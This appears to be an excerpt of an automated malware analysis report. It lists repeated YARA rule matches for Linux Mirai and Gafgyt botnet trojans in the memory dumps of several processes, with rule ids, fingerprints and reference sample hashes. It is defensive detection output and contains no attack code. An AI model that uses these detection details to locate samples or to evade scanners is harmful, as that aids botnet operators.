Source: 6559.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6559.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6559.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6559.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6559.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6611.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6611.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6611.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6611.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6611.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6611.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6611.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6598.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6598.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6598.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6598.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6598.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6598.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6598.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6537.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6537.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6537.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6537.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6537.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6537.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6537.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6462.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6462.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6462.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6462.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6462.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6462.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6462.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6610.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6610.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6610.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6610.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6610.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6610.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6610.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6565.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6565.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6565.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
